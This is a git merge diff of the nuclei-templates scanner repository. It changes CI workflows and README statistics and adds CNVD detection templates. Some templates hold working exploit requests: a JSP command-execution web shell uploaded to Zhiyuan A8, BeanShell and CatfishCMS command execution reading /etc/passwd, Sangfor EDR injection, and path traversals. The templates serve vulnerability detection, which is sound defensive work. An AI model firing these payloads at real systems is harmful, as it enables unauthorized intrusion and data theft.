Merge branch 'master' into master
commit
09de9e19ce
|
@ -58,6 +58,8 @@ We have also added a set of templates to help you understand how things work.
|
|||
Nuclei-templates is powered by major contributions from the community.
|
||||
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
|
||||
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
|
||||
|
||||
💬 Discussion
|
||||
-----
|
||||
|
||||
|
|
|
@ -10,23 +10,25 @@ jobs:
|
|||
docs:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
with:
|
||||
persist-credentials: false
|
||||
fetch-depth: 0
|
||||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
- uses: actions/checkout@v2
|
||||
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.17
|
||||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
|
||||
|
||||
- name: Setup CVE annotate
|
||||
if: steps.meta.outputs.tag != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.tag }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/cve-annotate.zip
|
||||
sudo unzip cve-annotate.zip -d /usr/local/bin
|
||||
working-directory: /tmp
|
||||
|
||||
- name: Generate CVE Annotations
|
||||
id: cve-annotate
|
||||
run: |
|
||||
if ! which cve-annotate > /dev/null; then
|
||||
echo -e "Command cve-annotate not found! Installing\c"
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/cve-annotate@dev
|
||||
fi
|
||||
cve-annotate -i ./cves/ -d .
|
||||
echo "::set-output name=changes::$(git status -s | wc -l)"
|
||||
|
||||
|
@ -35,6 +37,7 @@ jobs:
|
|||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git pull
|
||||
git add cves
|
||||
git commit -m "Auto Generated CVE annotations [$(date)] :robot:" -a
|
||||
|
||||
|
|
|
@ -0,0 +1,37 @@
|
|||
name: 🥳 New Template List
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
templates:
|
||||
runs-on: ubuntu-latest
|
||||
if: github.repository == 'projectdiscovery/nuclei-templates'
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
with:
|
||||
token: ${{ secrets.GITHUB_TOKEN }}
|
||||
persist-credentials: false
|
||||
fetch-depth: 0
|
||||
|
||||
- name: Generate new template list
|
||||
id: new-additions
|
||||
run: |
|
||||
git pull
|
||||
git diff --name-only --diff-filter=A $(git tag | tail -n 1) @ . | grep .yaml | tee .new-additions
|
||||
|
||||
- name: Commit files
|
||||
run: |
|
||||
git config --local user.email "action@github.com"
|
||||
git config --local user.name "GitHub Action"
|
||||
git add .new-additions -f
|
||||
git commit --allow-empty -m "Auto Generated New Template Addition List [$(date)] :robot:" -a
|
||||
|
||||
- name: Push changes
|
||||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
|
|
@ -0,0 +1,29 @@
|
|||
name: 📑 Template-DB Indexer
|
||||
|
||||
on:
|
||||
push:
|
||||
branches:
|
||||
- master
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
index:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.17
|
||||
|
||||
- name: Intalling Indexer
|
||||
run: |
|
||||
git config --global url."https://${{ secrets.ACCESS_TOKEN }}@github".insteadOf https://github
|
||||
git clone https://github.com/projectdiscovery/nucleish-api.git
|
||||
cd nucleish-api/cmd/generate-index/
|
||||
go install
|
||||
|
||||
- name: Generate Index
|
||||
env:
|
||||
AWS_ACCESS_KEY: ${{ secrets.AWS_ACCESS_KEY }}
|
||||
AWS_SECRET_KEY: ${{ secrets.AWS_SECRET_KEY }}
|
||||
run: |
|
||||
generate-index -mode templates
|
|
@ -6,24 +6,24 @@ jobs:
|
|||
build:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@master
|
||||
- uses: actions/setup-go@v2
|
||||
with:
|
||||
go-version: 1.17
|
||||
- uses: actions/checkout@v2
|
||||
|
||||
- name: Cache Go
|
||||
id: cache-go
|
||||
uses: actions/cache@v2
|
||||
with:
|
||||
path: /home/runner/go
|
||||
key: ${{ runner.os }}-go
|
||||
|
||||
- name: Installing Nuclei
|
||||
if: steps.cache-go.outputs.cache-hit != 'true'
|
||||
- name: Get Github tag
|
||||
id: meta
|
||||
run: |
|
||||
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
|
||||
echo "::set-output name=tag::$(curl --silent "https://api.github.com/repos/projectdiscovery/nuclei/releases/latest" | jq -r .tag_name)"
|
||||
|
||||
- name: Setup Nuclei
|
||||
if: steps.meta.outputs.tag != ''
|
||||
env:
|
||||
VERSION: ${{ steps.meta.outputs.tag }}
|
||||
run: |
|
||||
wget -q https://github.com/projectdiscovery/nuclei/releases/download/${VERSION}/nuclei_${VERSION:1}_linux_amd64.zip
|
||||
sudo unzip nuclei*.zip -d /usr/local/bin
|
||||
working-directory: /tmp
|
||||
|
||||
- name: Template Validation
|
||||
run: |
|
||||
cp -r ${{ github.workspace }} $HOME
|
||||
nuclei -validate -t .
|
||||
nuclei -validate -w ./workflows
|
|
@ -1,6 +1,9 @@
|
|||
name: 🗒 Templates Stats
|
||||
|
||||
on:
|
||||
push:
|
||||
tags:
|
||||
- '*'
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
|
@ -49,4 +52,4 @@ jobs:
|
|||
uses: ad-m/github-push-action@master
|
||||
with:
|
||||
github_token: ${{ secrets.GITHUB_TOKEN }}
|
||||
branch: ${{ github.ref }}
|
||||
branch: master
|
|
@ -0,0 +1,14 @@
|
|||
cves/2013/CVE-2013-6281.yaml
|
||||
cves/2018/CVE-2018-18608.yaml
|
||||
cves/2019/CVE-2019-18371.yaml
|
||||
cves/2021/CVE-2021-45428.yaml
|
||||
cves/2022/CVE-2022-0346.yaml
|
||||
cves/2022/CVE-2022-21500.yaml
|
||||
exposed-panels/jupyter-notebook.yaml
|
||||
exposed-panels/looker-panel.yaml
|
||||
exposures/files/xampp-environment-variables.yaml
|
||||
miscellaneous/robots-txt-endpoint.yaml
|
||||
ssl/self-signed-ssl.yaml
|
||||
token-spray/api-debounce.yaml
|
||||
token-spray/api-tatum.yaml
|
||||
vulnerabilities/dedecms/dedecms-config-xss.yaml
|
|
@ -10,7 +10,9 @@
|
|||
tags:
|
||||
- "fuzz"
|
||||
- "dos"
|
||||
- "misc"
|
||||
|
||||
# files is a list of files to ignore template execution
|
||||
# unless asked for by the user.
|
||||
|
||||
# files:
|
||||
# - cves/2020/CVE-2020-35489.yaml
|
||||
|
|
|
@ -24,5 +24,5 @@ I've validated this template locally?
|
|||
|
||||
- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
|
||||
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
|
||||
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
|
||||
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
|
||||
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
|
24
README.md
24
README.md
|
@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
|
|||
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 907 | dhiyaneshdk | 338 | cves | 913 | info | 903 | http | 2477 |
|
||||
| lfi | 377 | daffainfo | 333 | vulnerabilities | 347 | high | 691 | file | 57 |
|
||||
| panel | 318 | pikpikcu | 286 | exposed-panels | 318 | medium | 516 | network | 47 |
|
||||
| xss | 283 | pdteam | 216 | technologies | 220 | critical | 322 | dns | 12 |
|
||||
| wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | |
|
||||
| exposure | 250 | dwisiswant0 | 156 | misconfiguration | 163 | | | | |
|
||||
| rce | 230 | pussycat0x | 90 | token-spray | 127 | | | | |
|
||||
| tech | 223 | gy741 | 88 | takeovers | 65 | | | | |
|
||||
| cve2021 | 188 | 0x_akoko | 76 | default-logins | 63 | | | | |
|
||||
| wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | |
|
||||
| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 |
|
||||
| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 |
|
||||
| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 |
|
||||
| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 |
|
||||
| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | |
|
||||
| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
|
||||
| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | |
|
||||
| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | |
|
||||
| tech | 272 | gy741 | 119 | default-logins | 96 | | | | |
|
||||
| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | |
|
||||
|
||||
**190 directories, 2663 files**.
|
||||
**262 directories, 3566 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
@ -71,6 +71,8 @@ We have also added a set of templates to help you understand how things work.
|
|||
Nuclei-templates is powered by major contributions from the community.
|
||||
[Template contributions ](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [Feature Requests](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+) and [Bug Reports](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+) are more than welcome.
|
||||
|
||||
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
|
||||
|
||||
💬 Discussion
|
||||
-----
|
||||
|
||||
|
|
File diff suppressed because one or more lines are too long
2617
TEMPLATES-STATS.md
2617
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 907 | dhiyaneshdk | 338 | cves | 913 | info | 903 | http | 2477 |
|
||||
| lfi | 377 | daffainfo | 333 | vulnerabilities | 347 | high | 691 | file | 57 |
|
||||
| panel | 318 | pikpikcu | 286 | exposed-panels | 318 | medium | 516 | network | 47 |
|
||||
| xss | 283 | pdteam | 216 | technologies | 220 | critical | 322 | dns | 12 |
|
||||
| wordpress | 270 | geeknik | 172 | exposures | 196 | low | 166 | | |
|
||||
| exposure | 250 | dwisiswant0 | 156 | misconfiguration | 163 | | | | |
|
||||
| rce | 230 | pussycat0x | 90 | token-spray | 127 | | | | |
|
||||
| tech | 223 | gy741 | 88 | takeovers | 65 | | | | |
|
||||
| cve2021 | 188 | 0x_akoko | 76 | default-logins | 63 | | | | |
|
||||
| wp-plugin | 186 | princechaddha | 72 | file | 57 | | | | |
|
||||
| cve | 1168 | daffainfo | 564 | cves | 1172 | info | 1198 | http | 3209 |
|
||||
| panel | 517 | dhiyaneshdk | 423 | exposed-panels | 525 | high | 885 | file | 68 |
|
||||
| lfi | 464 | pikpikcu | 315 | vulnerabilities | 453 | medium | 667 | network | 50 |
|
||||
| xss | 371 | pdteam | 262 | technologies | 256 | critical | 415 | dns | 17 |
|
||||
| wordpress | 368 | geeknik | 179 | exposures | 204 | low | 182 | | |
|
||||
| rce | 296 | dwisiswant0 | 168 | misconfiguration | 200 | unknown | 6 | | |
|
||||
| exposure | 294 | princechaddha | 137 | workflows | 187 | | | | |
|
||||
| cve2021 | 289 | 0x_akoko | 134 | token-spray | 155 | | | | |
|
||||
| tech | 272 | gy741 | 119 | default-logins | 96 | | | | |
|
||||
| wp-plugin | 268 | pussycat0x | 116 | file | 68 | | | | |
|
||||
|
|
|
@ -0,0 +1,25 @@
|
|||
id: CNVD-2018-13393
|
||||
|
||||
info:
|
||||
name: Metinfo LFI
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
reference:
|
||||
- https://paper.seebug.org/676/
|
||||
tags: metinfo,cnvd,cvnd2018,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
|
||||
|
||||
redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<?php"
|
||||
- "login_met_cookie($metinfo_admin_name);"
|
||||
condition: and
|
|
@ -3,10 +3,16 @@ id: CNVD-2019-01348
|
|||
info:
|
||||
name: Xiuno BBS CNVD-2019-01348
|
||||
author: princechaddha
|
||||
severity: medium
|
||||
severity: high
|
||||
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
||||
tags: xiuno,cnvd
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cwe-id: CWE-284
|
||||
remediation: Upgrade to the latest version of Xiuno BBS or switch to a supported product.
|
||||
tags: xiuno,cnvd,cnvd2019
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -14,14 +20,18 @@ requests:
|
|||
- "{{BaseURL}}/install/"
|
||||
headers:
|
||||
Accept-Encoding: deflate
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "/view/js/xiuno.js"
|
||||
- "Choose Language (选择语言)"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/01/26
|
|
@ -0,0 +1,37 @@
|
|||
id: CNVD-2019-06255
|
||||
|
||||
info:
|
||||
name: CatfishCMS RCE
|
||||
author: Lark-Lab
|
||||
severity: critical
|
||||
description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
|
||||
reference:
|
||||
- https://its401.com/article/yun2diao/91344725
|
||||
- https://github.com/xwlrbh/Catfish/issues/4
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
remediation: Upgrade to CatfishCMS version 4.8.54 or later.
|
||||
tags: rce,cnvd,catfishcms,cnvd2019
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'OS'
|
||||
- 'PATH'
|
||||
- 'SHELL'
|
||||
- 'USER'
|
||||
condition: and
|
||||
|
||||
# Enhanced by cs on 2022/02/28
|
|
@ -0,0 +1,54 @@
|
|||
id: CNVD-2019-19299
|
||||
|
||||
info:
|
||||
name: Zhiyuan A8 - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue.
|
||||
reference:
|
||||
- https://www.cxyzjd.com/article/guangying177/110177339
|
||||
- https://github.com/sectestt/CNVD-2019-19299
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: zhiyuan,cnvd,cnvd2019,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /seeyon/htmlofficeservlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
|
||||
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
|
||||
Connection: close
|
||||
|
||||
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
|
||||
OPTION=S3WYOSWLBSGr
|
||||
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
|
||||
= WUghPB3szB3Xwg66 the CREATEDATE
|
||||
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
|
||||
originalFileId = wV66
|
||||
originalCreateDate = wUghPB3szB3Xwg66
|
||||
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
|
||||
needReadFile = yRWZdAS6
|
||||
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
|
||||
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
|
||||
|
||||
- |
|
||||
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_1, "htmoffice operate")'
|
||||
- 'contains(body_2, "Windows IP")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -0,0 +1,30 @@
|
|||
id: CNVD-2019-32204
|
||||
|
||||
info:
|
||||
name: Fanwei e-cology <=9.0 - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
|
||||
reference:
|
||||
- https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: fanwei,cnvd,cnvd2019,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -5,8 +5,9 @@ info:
|
|||
author: princechaddha
|
||||
severity: medium
|
||||
description: Xunyou cms has an arbitrary file reading vulnerability. Attackers can use vulnerabilities to obtain sensitive information.
|
||||
reference: https://www.cnvd.org.cn/flaw/show/2025171
|
||||
tags: xunchi,lfi,cnvd
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/2025171
|
||||
tags: xunchi,lfi,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -18,9 +19,10 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
|
||||
- "display_errors"
|
||||
part: body
|
||||
condition: and
|
|
@ -0,0 +1,33 @@
|
|||
id: CNVD-2020-46552
|
||||
|
||||
info:
|
||||
name: Sangfor EDR - Remote Code Execution
|
||||
author: ritikchaddha
|
||||
severity: critical
|
||||
description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host.
|
||||
reference:
|
||||
- https://www.modb.pro/db/144475
|
||||
- https://blog.csdn.net/bigblue00/article/details/108434009
|
||||
- https://cn-sec.com/archives/721509.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cve-id:
|
||||
cwe-id: CWE-77
|
||||
tags: cnvd,cnvd2020,sangfor,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "$show_input = function($info)")'
|
||||
- 'contains(body, "$strip_slashes($host)")'
|
||||
- 'contains(body, "Log Helper")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/18
|
|
@ -4,8 +4,9 @@ info:
|
|||
name: Ruijie Smartweb Default Password
|
||||
author: pikpikcu
|
||||
severity: low
|
||||
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
|
||||
tags: ruijie,default-login,cnvd
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
|
||||
tags: ruijie,default-login,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
|
@ -17,12 +18,11 @@ requests:
|
|||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Level was: LEVEL15"
|
||||
- "/WEB_VMS/LEVEL15/"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
|
@ -1,11 +1,12 @@
|
|||
id: CNVD-2020-62422
|
||||
|
||||
info:
|
||||
name: Seeyon readfile(CNVD-2020-62422)
|
||||
name: Seeyon - Arbitrary File Retrieval
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
reference: https://blog.csdn.net/m0_46257936/article/details/113150699
|
||||
tags: lfi,cnvd
|
||||
reference:
|
||||
- https://blog.csdn.net/m0_46257936/article/details/113150699
|
||||
tags: lfi,cnvd,cnvd2020,seeyon
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
@ -17,13 +18,15 @@ requests:
|
|||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/x-msdownload"
|
||||
condition: and
|
||||
part: header
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "ctpDataSource.password"
|
||||
condition: and
|
||||
part: body
|
|
@ -0,0 +1,44 @@
|
|||
id: CNVD-2020-67113
|
||||
|
||||
info:
|
||||
name: H5S CONSOLE Unauthorized Access Vulnerability (CNVD-2020-67113)
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: Zero Vision Technology (Shanghai) Co., Ltd. H5S CONSOLE Exists Unauthorized Access Vulnerability
|
||||
reference:
|
||||
- https://vul.wangan.com/a/CNVD-2020-67113
|
||||
metadata:
|
||||
shodan-query: http.title:"H5S CONSOLE"
|
||||
tags: h5s,unauth,h5sconsole,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/GetSrc"
|
||||
- "{{BaseURL}}/api/v1/GetDevice"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'strUser'
|
||||
- 'strPasswd'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'H5_AUTO'
|
||||
- 'H5_DEV'
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -1,11 +1,17 @@
|
|||
id: CNVD-2020-68596
|
||||
|
||||
info:
|
||||
name: WeiPHP 5.0 Path Traversal
|
||||
name: WeiPHP 5.0 - Path Traversal
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
|
||||
tags: weiphp,lfi,cnvd
|
||||
description: WeiPHP 5.0 is susceptible to directory traversal attacks.
|
||||
severity: high
|
||||
reference:
|
||||
- http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cwe-id: CWE-22
|
||||
tags: weiphp,lfi,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -34,9 +40,11 @@ requests:
|
|||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- https://weiphp.cn
|
||||
- WeiPHP
|
||||
- DB_PREFIX
|
||||
condition: and
|
||||
part: body
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -0,0 +1,30 @@
|
|||
id: CNVD-2021-01931
|
||||
|
||||
info:
|
||||
name: Ruoyi Management System - Arbitrary File Retrieval
|
||||
author: daffainfo,ritikchaddha
|
||||
severity: high
|
||||
reference:
|
||||
- https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
|
||||
tags: ruoyi,lfi,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
|
||||
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
|
@ -0,0 +1,32 @@
|
|||
id: CNVD-2021-09650
|
||||
|
||||
info:
|
||||
name: Ruijie EWEB Gateway Platform - Remote Command Injection
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
|
||||
reference:
|
||||
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
